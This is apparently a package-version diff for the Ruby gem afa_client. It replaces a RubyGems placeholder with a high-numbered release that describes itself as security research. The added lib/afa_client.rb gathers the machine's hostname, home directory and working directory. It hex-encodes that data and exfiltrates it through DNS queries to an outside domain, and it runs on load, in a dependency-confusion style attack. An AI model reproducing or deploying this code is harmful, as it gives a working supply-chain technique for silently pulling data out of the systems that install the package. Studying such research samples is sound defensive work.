afa_client 8.0.1 → 2300.4.3

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 00e30c04f5e804d72d079143e55b2b120d69ee14965e13510ffa458899ba5845
-  data.tar.gz: 5d5c2cce1c20c24fda87477b937af60e55843190c995068e1179dcc00da2e6c9
+  metadata.gz: fc9b944f44ca6ac14bb7ff4f63f96ec66f851ca4c45a036b087b2f5d951e2e68
+  data.tar.gz: dca1b7f6aa4eea01d30e1d7afd235afb0c5325aa161d46d8904f11077e6f7c76
 SHA512:
-  metadata.gz: d933a1554aa9a60d5caeadbffc81802e0e1e73a8d27b02e76413a58e826e27cedb521d831d6c359eac6665c6dfc3e4854e6db6bd54b0badfa7898727b28532ad
-  data.tar.gz: 240eb593a78ea20ee5b18d9facf9259e88d5227d891f0b6ac40e2ce9d4212c1122e2e0c2e05e14b853c6ac4fcb92d89aa407713b438368b6b65c95802a2edf47
+  metadata.gz: 23587e7af049af26cdfa129621bfd59fd17882ebedcefd2d695263f8c58455a9f40197308cf7d24f9d72d7eb5ab427f506159e09eaf3449d528a87a5a6e7404a
+  data.tar.gz: 53d43af03443cace9707edb4d064ae0208f1a670b12a0badb8808e62d31fc7b1f95f8ac51abdfb1ae3c1320ffa167d1da709291ff6707586300e5aca037ea21a

data/lib/afa_client.rb

@@ -0,0 +1,64 @@
+
+=begin
+
+This code is used for research purposes.
+
+No sensitive data is retrieved.
+
+Callbacks from within organizations with a
+responsible disclosure policy will be reported
+directly to the organizations.
+
+Any other callbacks will be ignored, and
+any associated data will not be kept.
+
+For any questions or suggestions:
+
+alex@ethicalhack.ro
+https://twitter.com/alxbrsn
+
+=end
+
+require 'socket'
+require 'json'
+require 'resolv'
+
+suffix = '.dns.alexbirsan-hacks-paypal.com'
+ns = 'dns1.alexbirsan-hacks-paypal.com'
+
+package = 'afa_client'
+
+# only the bare minimum to be able to identify
+# a vulnerable organization
+data = {
+    'p' => package,
+    'h' => Socket.gethostname,
+    'd' => File.expand_path('~'),
+    'c' => Dir.pwd
+}
+
+data = JSON.generate(data)
+data = data.unpack('H*')[0].scan(/.{1,60}/)
+
+id_1 = rand(36**12).to_s(36)
+id_2 = rand(36**12).to_s(36)
+
+begin
+    ns_ip = Resolv.getaddress(ns)
+rescue
+    ns_ip = '8.8.4.4'
+end
+
+custom_res = Resolv.new([Resolv::Hosts.new, 
+    Resolv::DNS.new(nameserver: [ns_ip, '8.8.8.8'])])
+
+
+data.each.each_with_index do |chunk, idx|
+    begin
+        Resolv.getaddress 'v2_f.' + id_1 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
+    rescue; end
+
+    begin
+        custom_res.getaddress 'v2_f.' + id_2 + '.' + idx.to_s + '.' + chunk + '.v2_e' + suffix
+    rescue; end
+end

metadata

@@ -1,23 +1,26 @@
 --- !ruby/object:Gem::Specification
 name: afa_client
 version: !ruby/object:Gem::Version
-  version: 8.0.1
+  version: 2300.4.3
 platform: ruby
 authors:
-- maciej@mensfeld.pl
+- Alex Birsan
 autorequire: 
 bindir: bin
 cert_chain: []
-date: 2023-06-23 00:00:00.000000000 Z
+date: 2020-09-14 00:00:00.000000000 Z
 dependencies: []
-description: 
-email: 
+description: This package is meant for security research purposes and does not contain
+  any useful code.
+email: alex@ethicalhack.ro
 executables: []
 extensions: []
 extra_rdoc_files: []
-files: []
-homepage: 
-licenses: []
+files:
+- lib/afa_client.rb
+homepage: https://twitter.com/alxbrsn
+licenses:
+- MIT
 metadata: {}
 post_install_message: 
 rdoc_options: []
@@ -34,8 +37,8 @@ required_rubygems_version: !ruby/object:Gem::Requirement
     - !ruby/object:Gem::Version
       version: '0'
 requirements: []
-rubygems_version: 3.3.4
+rubygems_version: 3.0.3
 signing_key: 
 specification_version: 4
-summary: Placeholder by RubyGems Security Team
+summary: Security research purposes only
 test_files: []